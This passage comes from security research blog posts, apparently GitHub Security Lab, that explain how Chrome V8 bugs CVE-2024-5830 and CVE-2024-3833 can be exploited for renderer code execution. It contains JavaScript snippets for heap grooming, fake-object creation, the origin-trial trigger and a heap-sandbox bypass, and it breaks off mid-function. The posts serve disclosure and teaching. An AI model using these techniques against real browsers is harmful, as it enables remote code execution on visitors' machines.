                                   representation, type);
}

Within UpdateDescriptorForValue the instance_descriptors of map are accessed. The instance_descriptors contain information about properties in the map but it is only relevant for fast maps. For a dictionary map, it is always an empty array with zero length. Accessing instance_descriptors of a dictionary map would therefore result in out-of-bounds (OOB) access to the empty array. In particular, the call to ReconfigureToDataField can modify entries in the instance_descriptors. While this may look like a promising OOB write primitive, the problem is that zero length descriptor arrays in v8 point to the empty_descriptor_array that is stored in a read-only region:


V(DescriptorArray, empty_descriptor_array, EmptyDescriptorArray)

Any OOB write to the empty_descriptor_array is only going to write to the read-only memory region and cause a crash. To avoid this, I need to cause CanHoldValue to return true so that ReconfigureToDataField is not called. In the call to CanHoldValue, an OOB entry to the empty_descriptor_array is read and then certain conditions are checked:


bool CanHoldValue(Tagged descriptors, InternalIndex descriptor,
                  PropertyConstness constness, Tagged value) {
  PropertyDetails details = descriptors->GetDetails(descriptor);
  if (details.location() == PropertyLocation::kField) {
    if (details.kind() == PropertyKind::kData) {
      return IsGeneralizableTo(constness, details.constness()) &&
             Object::FitsRepresentation(value, details.representation()) &&
             FieldType::NowContains(descriptors->GetFieldType(descriptor),
                                    value);
  ...

Although empty_descriptor_array is stored in a read-only region and I cannot control the memory content that is behind it, the read index, descriptor, is the array index that corresponds to the property prop, which I can control. By changing the number of properties that precede prop in x, I can control the OOB read offset to the empty_descriptor_array. This allows me to choose an appropriate offset so that the conditions in CanHoldValue are satisfied.

While this avoids an immediate crash, it is not exactly useful as far as exploits go. So, let’s take a look at what comes next after a dictionary map is returned from PrepareForDataProperty.


bool CanHoldValue(Tagged descriptors, InternalIndex descriptor,
                  PropertyConstness constness, Tagged value) {
  PropertyDetails details = descriptors->GetDetails(descriptor);
  if (details.location() == PropertyLocation::kField) {
    if (details.kind() == PropertyKind::kData) {
      return IsGeneralizableTo(constness, details.constness()) &&
             Object::FitsRepresentation(value, details.representation()) &&
             FieldType::NowContains(descriptors->GetFieldType(descriptor),
                                    value);
  ...

After the new_map returned, its instance_descriptors, which is the empty_descriptor_array, is read again at offset descriptor, and the result is used to provide another offset in a property write:


void JSObject::WriteToField(InternalIndex descriptor, PropertyDetails details,
                            Tagged value) {
  ...
  FieldIndex index = FieldIndex::ForDetails(map(), details);
  if (details.representation().IsDouble()) {
    ...
  } else {
    FastPropertyAtPut(index, value);
  }
}

In the above, index is encoded in the PropertyDetails and is used in FastPropertyAtPut to write a property in the resulting object. However, FastPropertyAtPut assumes that the object has fast properties stored in a PropertyArray while our object is in fact a dictionary object with properties stored in a NameDictionary. This causes confusion between PropertyArray and NameDictionary, and because NameDictionary contains a few more internal fields than PropertyArray, writing to a NameDictionary using an offset that is meant for a PropertyArray can end up overwriting some internal fields in the NameDictionary. A common way to exploit a confusion between fast and dictionary objects is to overwrite the capacity field in the NameDictionary, which is used for checking the bounds when the NameDictionary is accessed (similar to the method that I used to exploit another v8 bug in this post).

However, as I cannot fully control the PropertyDetails that comes from the OOB read of the empty_descriptor_array, I wasn’t able to overwrite the capacity field of the NameDictionary. Instead, I managed to overwrite another internal field, elements of the NameDictionary. Although the elements field is not normally used for property access, it is used in MigrateSlowToFast as a bound for accessing dictionary properties:


void JSObject::MigrateSlowToFast(Handle object,
                                 int unused_property_fields,
                                 const char* reason) {
  ...
  Handle iteration_order;
  int iteration_length;
  if constexpr (V8_ENABLE_SWISS_NAME_DICTIONARY_BOOL) {
    ...
  } else {
    ...
    iteration_length = dictionary->NumberOfElements();  //<---- elements field
  }
  ...
  for (int i = 0; i get(i)));
      k = dictionary->NameAt(index);

      value = dictionary->ValueAt(index);     //DetailsAt(index);
    }
    ...
  }
  ...
}

In MigrateSlowToFast, dictionary->NumberOfElements() is used as a bound of the property offsets in a loop that accesses the property NameDictionary. So by overwriting elements to a large value, I can cause OOB read when the property values are read in the loop. These property values are then copied to a newly created fast object. By arranging the heap carefully, I can control the value that is read and have it point to a fake object in the v8 heap.

In the above, the green box is the actual bounds of the NameDictionary, however, with a corrupted elements field, an OOB access can happen during MigrateSlowToFast, causing it to access the value in the red box, and use it as the value of the property. By arranging the heap, I can place arbitrary values in the red box, and in particular, I can make it point to a fake object that I created.

Heap arrangement in v8 is fairly straightforward as objects are allocated linearly in the v8 heap. To place control values after the NameDictionary, I can allocate arrays after the object is cloned and then write control values to the array entries.


var y = {...x};  //<---- NameDictionary allocated

//Placing control values after the NameDictionary
var arr = new Array(256);
for (let i = 0; i < 7; i++) {
  arr[i] = new Array(256);
  for (let j = 0; j < arr[i].length; j++) {
    arr[i][j] = nameAddrF;
  }
}

To make sure that the value I placed after the NameDictionary points to a fake object, I need to know the address of the fake object. As I pointed out in a talk that I gave at the POC2022 conference, object addresses in v8 can be predicted reliably by simply knowing the version of Chrome. This allows me to work out the address of the fake object to use:


var dblArray = [1.1,2.2];
var dblArrayAddr = 0x4881d;  //<---- address of dblArray is consistent across runs

var dblArrayEle = dblArrayAddr - 0x18;
//Creating a fake double array as an element with length 0x100
dblArray[0] = i32tof(dblArrMap, 0x725);
dblArray[1] = i32tof(dblArrayEle, 0x100);

By using the known addresses of objects and their maps, I can create both the fake object and also obtain its address.

Once the heap is prepared, I can trigger MigrateSlowToFast to access the fake object. This can be done by first making the cloned object, y, a prototype of another object, z. Accessing any property of z will then trigger MakePrototypesFast, which calls MigrateSlowToFast for the object y:


var z = {};
z.__proto__ = y;
z.p;    //<------ Calls MigrateSlowToFast for y

This then turns y into a fast object, with the fake object that I prepared earlier accessible as a property of y. A useful fake object is a fake double array with a large length, which can then be used to cause an OOB access to its elements.

Once an OOB access to the fake double array is achieved, gaining arbitrary read and write in the v8 heap is rather straightforward. It essentially consists of the following steps:

First, place an Object Array after the fake double array, and use the OOB read primitive in the fake double array to read the addresses of the objects stored in this array. This allows me to obtain the address of any V8 object.
Place another double array, writeArr after the fake double array, and use the OOB write primitive in the fake double array to overwrite the element field of writeArr to an object address. Accessing the elements of writeArr then allows me to read/write to arbitrary addresses.

Thinking outside of the heap sandbox

In Chrome, Web API objects, such as the DOM object, are implemented in Blink. Objects in Blink are allocated outside of the v8 heap and are represented as api objects in v8:


var domRect = new DOMRect(1.1,2.3,3.3,4.4);
%DebugPrint(domRect);

DebugPrint: 0x7610003484c9: [[api object] 0]
 ...
 - embedder fields: 2
 - properties: 0x7610000006f5 
 - All own properties (excluding elements): {}
 - embedder fields = {
    0, aligned pointer: 0x7718f770b880
    0, aligned pointer: 0x325d00107ca8
 }
0x7610003b6985: [Map] in OldSpace
 - map: 0x76100022f835 
 - type: [api object] 0
 ...

These objects are essentially wrappers to objects in Blink, and they contain two embedder fields that store the locations of the actual Blink object, as well as their actual type. Although embedder fields show up as pointer values in the DebugPrint, because of the heap sandbox, they are not actually stored as pointers in the v8 object, but as indices to a lookup table that is protected from being modified within the v8 heap.


bool EmbedderDataSlot::ToAlignedPointer(Isolate* isolate,
                                        void** out_pointer) const {
  ...
#ifdef V8_ENABLE_SANDBOX
  // The raw part must always contain a valid external pointer table index.
  *out_pointer = reinterpret_cast(
      ReadExternalPointerField(
          address() + kExternalPointerOffset, isolate));
  return true;
  ...
}

The external look up table ensures that an embedder field must be a valid index in the table, and also any pointer returned from reading the embedder field must point to a valid Blink object. However, with arbitrary read and write in the v8 heap, I can still replace the embedder field of one api object by the embedder field of another api object that has a different type in Blink. This can then be used to cause type confusion in the Blink object.

In particular, I can cause a type confusion between a DOMRect and a DOMTypedArray. A DOMRect is a simple data structure, with four properties x, y, width, height specifying its dimensions. Accessing these properties simply involves writing to and reading from the corresponding offsets in the DOMRect Blink object. By causing a type confusion between a DOMRect and another other Blink object, I can read and write the values of any Blink object from these offsets. In particular, by confusing a DOMRect with a DOMTypedArray, I can overwrite its backing_store_ pointer, which points to the data storage of the DOMTypedArray. Changing the backing_store_ to an arbitrary pointer value and then accessing entries in the DOMTypedArray then gives me arbitrary read and write access to the entire memory space.

To defeat ASLR and identify useful addresses in the process memory, note that each api object also contains an embedder field that stores a pointer to the wrapper_type_info of the Blink object. Since these wrapper_type_info are global static objects, by confusing this embedder field with a DOMRect object, I can read the pointer to the wrapper_type_info as a property in a DOMRect. In particular, I can now read the address of the TrustedCage::base_, which is the offset to a memory region that contains important objects such as JIT code addresses etc. I can now simply compile a JIT function, and modify the address of its JIT code to achieve arbitrary code execution.

The exploit can be found here with some setup notes.

Conclusion

In this post, I’ve looked at CVE-2024-5830, a confusion between fast and dictionary objects caused by updating of a deprecated map. Map transition and deprecation often introduces complex and subtle problems and has also led to issues that were exploited in the wild. In this case, updating a deprecated map causes it to become a dictionary map unexpectedly, and in particular, the resulting dictionary map is used by code that assumes the input to be a fast map. This allows me to overwrite an internal property of the dictionary map and eventually cause an OOB access to the dictionary. I can then use this OOB access to create a fake object, leading to arbitrary read and write of the v8 heap.

To bypass the v8 heap sandbox, I modify API objects that are wrappers of Blink objects in v8, causing type confusions in objects outside of the heap sandbox. I then leverage this to achieve arbitrary memory read and write outside of the v8 heap sandbox, and in turn arbitrary code execution in the Chrome renderer process.

The post From object transition to RCE in the Chrome renderer appeared first on The GitHub Blog.

Attack of the clones: Getting RCE in Chrome’s renderer with duplicate object properties

Man Yue Mo — Wed, 26 Jun 2024 16:00:53 +0000

In this post, I’ll exploit CVE-2024-3833, an object corruption bug in v8, the Javascript engine of Chrome, that I reported in March 2024 as bug 331383939. A similar bug, 331358160, was also reported and was assigned CVE-2024-3832. Both of these bugs were fixed in version 124.0.6367.60/.61. CVE-2024-3833 allows RCE in the renderer sandbox of Chrome by a single visit to a malicious site.

Origin trials in Chrome

New features in Chrome are sometimes rolled out as origin trials features before they are made available in general. When a feature is offered as an origin trial, web developers can register their origins with Chrome, which allows them to use the feature on the registered origin. This allows web developers to test a new feature on their website and provide feedback to Chrome, while keeping the feature disabled on websites that haven’t requested their use. Origin trials are active for a limited amount of time and anyone can register their origin to use a feature from the list of active trials. By registering the origin, the developer is given an origin trial token, which they can include in their website by adding a meta tag: .

The old bug

Usually, origin trials features are enabled before any user Javascript is run. This, however, is not always true. A web page can create the meta tag that contains the trial token programmatically at any time, and Javascript can be executed before the tag is created. In some cases, the code responsible for turning on the specific origin trial feature wrongly assumes that no user Javascript has run before it, which can lead to security issues.

One example was CVE-2021-30561, reported by Sergei Glazunov of Google Project Zero. In that case, the WebAssembly Exception Handling feature would create an Exception property in the Javascript WebAssembly object when the origin trial token was detected.


let exception = WebAssembly.Exception; //<---- undefined
...
meta = document.createElement('meta');  
meta.httpEquiv = 'Origin-Trial';  
meta.content = token; 
document.head.appendChild(meta);  //<---- activates origin trial
...
exception = WebAssembly.Exception; //<---- property created

In particular, the code that creates the Exception property uses an internal function to create the property, which assumes the Exception property does not exist in the WebAssembly object. If the user created the Exception property prior to activating the trial, then Chrome would try to create another Exception property in WebAssembly. This could produce two duplicated Exception properties in WebAssembly with different values. This can then be used to cause type confusion in the Exception property, which can then be exploited to gain RCE.


WebAssembly.Exception = 1.1;
...
meta = document.createElement('meta');  
meta.httpEquiv = 'Origin-Trial';  
meta.content = token; 
document.head.appendChild(meta);  //<---- creates duplicate Exception property
...

What actually happens with CVE-2021-30561 is more complicated because the code that enables the WebAssembly Exception Handling feature does check to make sure that the WebAssembly object does not already contain a property named Exception. The check used there, however, is not sufficient and is bypassed in CVE-2021-30561 by using the Javascript Proxy object. For details of how this bypass and exploit works, I’ll refer readers to look at the original bug ticket, which contains all the details.

Another day, another bypass

Javascript Promise Integration is a WebAssembly feature that is currently in an origin trial (until October 29, 2024). Similar to the WebAssembly Exception Handling feature, it defines properties on the WebAssembly object when an origin trial token is detected by calling InstallConditionalFeatures:


void WasmJs::InstallConditionalFeatures(Isolate* isolate,
                                        Handle context) {
   ...
  // Install JSPI-related features.
  if (isolate->IsWasmJSPIEnabled(context)) {
    Handle suspender_string = v8_str(isolate, "Suspender");
    if (!JSObject::HasRealNamedProperty(isolate, webassembly, suspender_string)  //<--- 1.
             .FromMaybe(true)) {
      InstallSuspenderConstructor(isolate, context);
    }

    // Install Wasm type reflection features (if not already done).
    Handle function_string = v8_str(isolate, "Function");
    if (!JSObject::HasRealNamedProperty(isolate, webassembly, function_string)   //<--- 2.
             .FromMaybe(true)) {
      InstallTypeReflection(isolate, context);
    }
  }
}

When adding the Javascript Promise Integration (JSPI), The code above checks whether webassembly already has the properties Suspender and Function (1. and 2. in the above), if not, it’ll create these properties using InstallSuspenderConstructor and InstallTypeReflection respectively. The function InstallSuspenderConstructor uses InstallConstructorFunc to create the Suspender property on the WebAssembly object:


void WasmJs::InstallSuspenderConstructor(Isolate* isolate,
                                         Handle context) {
  Handle webassembly(context->wasm_webassembly_object(), isolate);  //<--- 3.
  Handle suspender_constructor = InstallConstructorFunc(
      isolate, webassembly, "Suspender", WebAssemblySuspender);
  ...
}

The problem is, in InstallSuspenderConstructor, the WebAssembly object comes from the wasm_webassembly_object property of context (3. in the above), while the WebAssembly object that is checked in InstallConditionalFeatures comes from the property WebAssembly of the global object (which is the same as the global WebAssembly variable):


void WasmJs::InstallConditionalFeatures(Isolate* isolate,
                                        Handle context) {
  Handle global = handle(context->global_object(), isolate);
  // If some fuzzer decided to make the global object non-extensible, then
  // we can't install any features (and would CHECK-fail if we tried).
  if (!global->map()->is_extensible()) return;

  MaybeHandle maybe_wasm =
      JSReceiver::GetProperty(isolate, global, "WebAssembly");

The global WebAssembly variable can be changed to any user defined object by using Javascript:


WebAssembly = {}; //<---- changes the WebAssembly global variable

While this changes the value of WebAssembly, the wasm_webassembly_object cached in context is not affected. It is therefore possible to first define a Suspender property on the WebAssembly object, then set the WebAssembly variable to a different object and then activate the Javascript Promise Integration origin trial to create a duplicate Suspender in the original WebAssembly object:


WebAssembly.Suspender = {};
delete WebAssembly.Suspender;
WebAssembly.Suspender = 1;
//stores the original WebAssembly object in oldWebAssembly
var oldWebAssembly = WebAssembly;
var newWebAssembly = {};
WebAssembly = newWebAssembly;
//Activate trial
meta = document.createElement('meta');  
meta.httpEquiv = 'Origin-Trial';  
meta.content = token; 
document.head.appendChild(meta);  //<---- creates duplicate Suspender property in oldWebAssembly
%DebugPrint(oldWebAssembly);

When the origin trial is triggered, InstallConditionalFeatures first checks that the Suspender property is absent from the WebAssembly global variable (which is newWebAssembly in the above). It then proceeds to create the Suspender property in context->wasm_webassembly_object (which is oldWebAssembly in the above). Doing so creates a duplicate Suspender property in oldWebAssembly, much like what happened in CVE-2021-30561.


DebugPrint: 0x2d5b00327519: [JS_OBJECT_TYPE] in OldSpace
 - map: 0x2d5b00387061  [DictionaryProperties]
 - prototype: 0x2d5b003043e9 
 - elements: 0x2d5b000006f5  [HOLEY_ELEMENTS]
 - properties: 0x2d5b0034a8fd 
 - All own properties (excluding elements): {
   ...
   Suspender: 0x2d5b0039422d  (data, dict_index: 20, attrs: [W_C])
   ...
   Suspender: 1 (data, dict_index: 19, attrs: [WEC])

This causes oldWebAssembly to have 2 Suspender properties that are stored at different offsets. I reported this issue as 331358160 and it was assigned CVE-2024-3832.

The function InstallTypeReflection suffers a similar problem but have some extra issues:


void WasmJs::InstallTypeReflection(Isolate* isolate,
                                   Handle context) {
  Handle webassembly(context->wasm_webassembly_object(), isolate);

#define INSTANCE_PROTO_HANDLE(Name) \
  handle(JSObject::cast(context->Name()->instance_prototype()), isolate)
  ...
  InstallFunc(isolate, INSTANCE_PROTO_HANDLE(wasm_tag_constructor), "type",  //<--- 1.
              WebAssemblyTableType, 0, false, NONE,
              SideEffectType::kHasNoSideEffect);
  ...
#undef INSTANCE_PROTO_HANDLE
}

The function InstallTypeReflection also defines a type property in various other objects. For example, in 1., the property type is created in the prototype object of the wasm_tag_constructor, without checking whether the property already existed:


var x = WebAssembly.Tag.prototype;
x.type = {};
meta = document.createElement('meta');
meta.httpEquiv = 'Origin-Trial';
meta.content = token;
document.head.appendChild(meta);  //<--- creates duplicate type property on x

This then allows duplicate type properties to be created on WebAssembly.Tag.prototype. This issue was reported as 331383939 and was assigned CVE-2024-3833.

A new exploit

The exploit for CVE-2021-30561 relies on creating duplicate properties of “fast objects.” In v8, fast objects store their properties in an array (some properties are also stored inside the object itself). However, a hardening patch has since landed, which checks for duplicates when adding properties to a fast object. As such, it is no longer possible to create fast objects with duplicate properties.

It is, however, still possible to use the bug to create duplicate properties in “dictionary objects.” In v8, property dictionaries are implemented as NameDictionary. The underlying storage of a NameDictionary is implemented as an array, with each element being a tuple of the form (Key, Value, Attribute), where Key is the name of the property. When adding a property to the NameDictionary, the next free entry in the array is used to store this new tuple. With the bug, it is possible to create different entries in the property dictionary with a duplicate Key. In the report of CVE-2023-2935, Sergei Glazunov showed how to exploit the duplicate property primitive with dictionary objects. This, however, relies on being able to create the duplicate property as an AccessorInfo property, which is a special kind of property in v8 that is normally reserved for builtin objects. This, again, is not possible in the current case. So, I need to find a new way to exploit this issue.

The idea is to look for some internal functions or optimizations that will go through all the properties of an object, but not expect properties to be duplicated. One such optimization that comes to mind is object cloning.

Attack of the clones

When an object is copied using the spread syntax, a shallow copy of the original object is created:


const clonedObj = { ...obj1 };

In v8, this is implemented as the CloneObject bytecode:


0x39b300042178 @    0 : 80 00 00 29       CreateObjectLiteral [0], [0], #41
...
0x39b300042187 @   15 : 82 f7 29 05       CloneObject r2, #41, [5]

When a function containing the bytecode is first run, inline cache code is generated and used to handle the bytecode in subsequent calls. While handling the bytecode, the inline cache code will also collect information about the input object (obj1) and generate optimized inline cache handlers for inputs of the same type. When the inline cache code is first run, there is no information about previous input objects, and no cached handler is available. As a result, an inline cache miss is detected and CloneObjectIC_Miss is used to handle the bytecode. To understand how the CloneObject inline cache works and how it is relevant to the exploit, I’ll recap some basics in object types and properties in v8. Javascript objects in v8 store a map field that specifies the type of the object, and, in particular, it specifies how properties are stored in the object:


x = { a : 1};
x.b = 1;
%DebugPrint(x);

The output of %DebugPrint is as follows:


DebugPrint: 0x1c870020b10d: [JS_OBJECT_TYPE]
 - map: 0x1c870011afb1  [FastProperties]
 ...
 - properties: 0x1c870020b161 
 - All own properties (excluding elements): {
    0x1c8700002ac1: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
    0x1c8700002ad1: [String] in ReadOnlySpace: #b: 1 (const data field 1), location: properties[0]
 }

We see that x has two properties—one is stored in the object (a) and the other stored in a PropertyArray. Note that the length of the PropertyArray is 3 (PropertyArray[3]), while only one property is stored in the PropertyArray. The length of a PropertyArray is like the capacity of a std::vector in C++. Having a slightly bigger capacity avoids having to extend and reallocate the PropertyArray every time a new property is added to the object.

The map of the object uses the fields inobject_properties and unused_property_fields to indicate how many properties are stored in the object and how much space is left in the PropertyArray. In this case, we have 2 free spaces (3 (PropertyArray length) - 1 (property in the array) = 2).


0x1c870011afb1: [Map] in OldSpace
 - map: 0x1c8700103c35 
 - type: JS_OBJECT_TYPE
 - instance size: 16
 - inobject properties: 1
 - unused property fields: 2
...

When a cache miss happens, CloneObjectIC_Miss first tries to determine whether the result of the clone (the target) can use the same map as the original object (the source) by examining the map of the source object using GetCloneModeForMap (1. in the following):


RUNTIME_FUNCTION(Runtime_CloneObjectIC_Miss) {
  HandleScope scope(isolate);
  DCHECK_EQ(4, args.length());
  Handle source = args.at(0);
  int flags = args.smi_value_at(1);

  if (!MigrateDeprecated(isolate, source)) {
        ...
        FastCloneObjectMode clone_mode =
            GetCloneModeForMap(source_map, flags, isolate);  //<--- 1.
        switch (clone_mode) {
          case FastCloneObjectMode::kIdenticalMap: {
            ...
          }
          case FastCloneObjectMode::kEmptyObject: {
            ...
          }
          case FastCloneObjectMode::kDifferentMap: {
            ...
          }
          ...
        }
     ...
  }
  ...
}

The case that is relevant to us is the FastCloneObjectMode::kDifferentMap mode.


case FastCloneObjectMode::kDifferentMap: {
  Handle res;
  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, res, CloneObjectSlowPath(isolate, source, flags));   //<----- 1.
  Handle result_map(Handle::cast(res)->map(),
                         isolate);
  if (CanFastCloneObjectWithDifferentMaps(source_map, result_map,
                                          isolate)) {
    ...
    nexus.ConfigureCloneObject(source_map,                          //<----- 2.
                               MaybeObjectHandle(result_map));
...

In this mode, a shallow copy of the source object is first made via the slow path (1. in the above). The handler of the inline cache is then encoded as a pair of maps consisting of the map for the source and target objects respectively (2. in the above).

From now on, if another object with the source_map is being cloned, the inline cache handler is used to clone the object. Essentially, the source object is copied as follows:

Make a copy of the PropertyArray of the source object:


      TNode source_property_array = CAST(source_properties);

      TNode length = LoadPropertyArrayLength(source_property_array);
      GotoIf(IntPtrEqual(length, IntPtrConstant(0)), &allocate_object);

      TNode property_array = AllocatePropertyArray(length);
      FillPropertyArrayWithUndefined(property_array, IntPtrConstant(0), length);
      CopyPropertyArrayValues(source_property_array, property_array, length,
                              SKIP_WRITE_BARRIER, DestroySource::kNo);
      var_properties = property_array;

Allocate the target object and use result_map as its map.


  TNode object = UncheckedCast(AllocateJSObjectFromMap(
        result_map.value(), var_properties.value(), var_elements.value(),
        AllocationFlag::kNone,
        SlackTrackingMode::kDontInitializeInObjectProperties));

Copy the in-object properties from source to target.


    BuildFastLoop(
        result_start, result_size,
        [=](TNode field_index) {
          ...
          StoreObjectFieldNoWriteBarrier(object, result_offset, field);
        },
        1, LoopUnrollingMode::kYes, IndexAdvanceMode::kPost);

What happens if I try to clone an object that has a duplicated property? When the code is first run, CloneObjectSlowPath is called to allocate the target object, and then copy each property from the source to target. However, the code in CloneObjectSlowPath handles duplicate properties properly, so when the duplicated property in source is encountered, instead of creating a duplicate property in target, the existing property is overwritten instead. For example, if my source object has this following layout:


DebugPrint: 0x38ea0031b5ad: [JS_OBJECT_TYPE] in OldSpace
 - map: 0x38ea00397745  [FastProperties]
 ...
 - properties: 0x38ea00355e85 
 - All own properties (excluding elements): {
    0x38ea00004045: [String] in ReadOnlySpace: #type: 0x38ea0034b171  (const data field 0), location: in-object
    0x38ea0038257d: [String] in OldSpace: #a1: 1 (const data field 1), location: in-object
    0x38ea0038258d: [String] in OldSpace: #a2: 1 (const data field 2), location: in-object
    0x38ea0038259d: [String] in OldSpace: #a3: 1 (const data field 3), location: in-object
    0x38ea003825ad: [String] in OldSpace: #a4: 1 (const data field 4), location: properties[0]
    0x38ea003825bd: [String] in OldSpace: #a5: 1 (const data field 5), location: properties[1]
    0x38ea003825cd: [String] in OldSpace: #a6: 1 (const data field 6), location: properties[2]
    0x38ea00004045: [String] in ReadOnlySpace: #type: 0x38ea00397499  (const data field 7), location: properties[3]

Which has a PropertyArray of length 4, with a duplicated type as the last property in the PropertyArray. The target resulting from cloning this object will have the first type property overwritten:


DebugPrint: 0x38ea00355ee1: [JS_OBJECT_TYPE]
 - map: 0x38ea003978b9  [FastProperties]
 ...
 - properties: 0x38ea00356001 
 - All own properties (excluding elements): {
    0x38ea00004045: [String] in ReadOnlySpace: #type: 0x38ea00397499  (data field 0), location: in-object
    0x38ea0038257d: [String] in OldSpace: #a1: 1 (const data field 1), location: in-object
    0x38ea0038258d: [String] in OldSpace: #a2: 1 (const data field 2), location: in-object
    0x38ea0038259d: [String] in OldSpace: #a3: 1 (const data field 3), location: in-object
    0x38ea003825ad: [String] in OldSpace: #a4: 1 (const data field 4), location: properties[0]
    0x38ea003825bd: [String] in OldSpace: #a5: 1 (const data field 5), location: properties[1]
    0x38ea003825cd: [String] in OldSpace: #a6: 1 (const data field 6), location: properties[2]

Note that the target has a PropertyArray of length 3 and also three properties in the PropertyArray (properties #a4..#a6, which have location in properties) In particular, there is no unused_property_fields in the target object:


0x38ea003978b9: [Map] in OldSpace
 - map: 0x38ea003034b1 
 - type: JS_OBJECT_TYPE
 - instance size: 28
 - inobject properties: 4
 - unused property fields: 0

While this may look like a setback as the duplicated property does not get propagated to the target object, the real magic happens when the inline cache handler takes over. Remember that, when cloning with the inline cache handler, the resulting object has the same map as the target object from CloneObjectSlowPath, while the PropertyArray is a copy of the PropertyArray of the source object. That means the clone target from inline cache handler has the following property layout:


DebugPrint: 0x38ea003565c9: [JS_OBJECT_TYPE]
 - map: 0x38ea003978b9  [FastProperties]
 ...
 - properties: 0x38ea003565b1 
 - All own properties (excluding elements): {
    0x38ea00004045: [String] in ReadOnlySpace: #type: 0x38ea0034b171  (data field 0), location: in-object
    0x38ea0038257d: [String] in OldSpace: #a1: 1 (data field 1), location: in-object
    0x38ea0038258d: [String] in OldSpace: #a2: 1 (data field 2), location: in-object
    0x38ea0038259d: [String] in OldSpace: #a3: 1 (data field 3), location: in-object
    0x38ea003825ad: [String] in OldSpace: #a4: 1 (data field 4), location: properties[0]
    0x38ea003825bd: [String] in OldSpace: #a5: 1 (data field 5), location: properties[1]
    0x38ea003825cd: [String] in OldSpace: #a6: 1 (data field 6), location: properties[2]

Note that it has a PropertyArray of length 4, but only three properties in the array, leaving one unused property. However, its map is the same as the one used by CloneObjectSlowPath (0x38ea003978b9), which has no unused_property_fields:


0x38ea003978b9: [Map] in OldSpace
 - map: 0x38ea003034b1 
 - type: JS_OBJECT_TYPE
 - instance size: 28
 - inobject properties: 4
 - unused property fields: 0

So, instead of getting an object with a duplicated property, I end up with an object that has an inconsistent unused_property_fields and PropertyArray. Now, if I add a new property to this object, a new map will be created to reflect the new property layout of the object. This new map has an unused_property_fields based on the old map, which is calculated in AccountAddedPropertyField. Essentially, if the old unused_property_fields is positive, this decreases the unused_property_fields by one to account for the new property being added. And if the old unused_property_fields is zero, then the new unused_property_fields is set to two, accounting for the fact that the PropertyArray is full and has to be extended.

On the other hand, the decision to extend the PropertyArray is based on its length rather than unused_property_fields of the map:


void MigrateFastToFast(Isolate* isolate, Handle object,
                       Handle new_map) {
    ...
    // Check if we still have space in the {object}, in which case we
    // can also simply set the map (modulo a special case for mutable
    // double boxes).
    FieldIndex index = FieldIndex::ForDetails(*new_map, details);
    if (index.is_inobject() || index.outobject_array_index() property_array(isolate)->length()) {
      ...
      object->set_map(*new_map, kReleaseStore);
      return;
    }
    // This migration is a transition from a map that has run out of property
    // space. Extend the backing store.
    int grow_by = new_map->UnusedPropertyFields() + 1;
    ...

So, if I have an object that has zero unused_property_fields but a space left in the PropertyArray, (that is, length = existing_property_number + 1) then the PropertyArray will not be extended when I add a new property. So, after adding a new property, the PropertyArray will be full. However, as mentioned before, unused_property_fields is updated independently and it will be set to two as if the PropertyArray is extended:


DebugPrint: 0x2575003565c9: [JS_OBJECT_TYPE]
 - map: 0x257500397749  [FastProperties]
 ...
 - properties: 0x2575003565b1 
 - All own properties (excluding elements): {
    0x257500004045: [String] in ReadOnlySpace: #type: 0x25750034b171  (data field 0), location: in-object
    0x25750038257d: [String] in OldSpace: #a1: 1 (data field 1), location: in-object
    0x25750038258d: [String] in OldSpace: #a2: 1 (data field 2), location: in-object
    0x25750038259d: [String] in OldSpace: #a3: 1 (data field 3), location: in-object
    0x2575003825ad: [String] in OldSpace: #a4: 1 (data field 4), location: properties[0]
    0x2575003825bd: [String] in OldSpace: #a5: 1 (data field 5), location: properties[1]
    0x2575003825cd: [String] in OldSpace: #a6: 1 (data field 6), location: properties[2]
    0x257500002c31: [String] in ReadOnlySpace: #x: 1 (const data field 7), location: properties[3]
 }
0x257500397749: [Map] in OldSpace
 - map: 0x2575003034b1 
 - type: JS_OBJECT_TYPE
 - instance size: 28
 - inobject properties: 4
 - unused property fields: 2

This is important because the JIT compiler of v8, TurboFan, uses unused_property_fields to decide whether PropertyArray needs to be extended:


JSNativeContextSpecialization::BuildPropertyStore(
    Node* receiver, Node* value, Node* context, Node* frame_state, Node* effect,
    Node* control, NameRef name, ZoneVector* if_exceptions,
    PropertyAccessInfo const& access_info, AccessMode access_mode) {
    ...
    if (transition_map.has_value()) {
      // Check if we need to grow the properties backing store
      // with this transitioning store.
      ...
      if (original_map.UnusedPropertyFields() == 0) {
        DCHECK(!field_index.is_inobject());

        // Reallocate the properties {storage}.
        storage = effect = BuildExtendPropertiesBackingStore(
            original_map, storage, effect, control);

So, by adding new properties to an object with two unused_property_fields and a full PropertyArray via JIT, I’ll be able to write to PropertyArray out-of-bounds (OOB) and overwrite whatever that is allocated after it.

Creating a fast object with duplicate properties

In order to cause the OOB write in PropertyArray, I first need to create a fast object with duplicate properties. As mentioned before, a hardening patch has introduced a check for duplicates when adding properties to a fast object, and I therefore cannot create a fast object with duplicate properties directly. The solution is to first create a dictionary object with duplicate properties using the bug, and then change the object into a fast object. To do so, I’ll use WebAssembly.Tag.prototype to trigger the bug:


var x = WebAssembly.Tag.prototype;
x.type = {};
//delete properties results in dictionary object
delete x.constructor;
//Trigger bug to create duplicated type property
...

Once I’ve got a dictionary object with a duplicated property, I can change it to a fast object by using MakePrototypesFast, which can be triggered via property access:


var y = {};
//setting x to the prototype of y
var y.__proto__ = x;
//Property access of `y` calls MakePrototypeFast on x
y.a = 1;
z = y.a;

By making x to be the prototype of an object y and then accessing a property of y, MakePrototypesFast is called to change x into a fast object with duplicate properties. After this, I can clone x to trigger an OOB write in the PropertyArray.

Exploiting OOB write in PropertyArray

To exploit the OOB write in the PropertyArray, let’s first check and see what is allocated after the PropertyArray. Recall that the PropertyArray is allocated in the inline cache handler. From the handler code, I can see that PropertyArray is allocated right before the target object is allocated:


void AccessorAssembler::GenerateCloneObjectIC() {
    ...
      TNode property_array = AllocatePropertyArray(length);  //<--- property_array allocated
      ...
      var_properties = property_array;
    }

    Goto(&allocate_object);
    BIND(&allocate_object);
    ...
    TNode object = UncheckedCast(AllocateJSObjectFromMap(  //<--- target object allocated
        result_map.value(), var_properties.value(), var_elements.value(),
        AllocationFlag::kNone,
        SlackTrackingMode::kDontInitializeInObjectProperties));

As v8 allocates objects linearly, an OOB write therefore allows me to alter the internal fields of the target object. To exploit this bug, I’ll overwrite the second field of the target object, the properties field, which stores the address of the PropertyArray for the target object. This involves creating JIT functions to add two properties to the target object.


a8 = {c : 1};
...
function transition_store(x) {
